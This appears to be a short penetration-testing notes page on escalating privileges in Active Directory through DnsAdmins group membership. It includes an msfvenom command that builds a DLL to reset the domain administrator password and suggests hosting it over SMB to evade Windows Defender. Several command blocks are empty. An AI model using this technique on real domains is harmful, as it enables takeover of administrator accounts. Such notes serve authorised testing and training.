Pentest - Active Directory - DNS
DNS
DNSAdmins
Being a member of the DnsAdmins group allows us to use the dnscmd.exe to specify a plugin DLL that should be loaded by the DNS service. Let’s create a DLL using msfvenom that changes the administrator password.
|
|
Microsoft Windows [Version 10.0.26100.6584]
(c) Microsoft Corporation. All rights reserved.
c:\Users\kdbed\kdbed.github.io\org>msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll
c:\Users\kdbed\kdbed.github.io\org>
Transferring this to the box would likely trigger Windows Defender, so we can use Impacket’s smbserver.py to start an SMB server and host the dll remotely.
|
|
Then set the remote DLL path in the Windows registry
|
|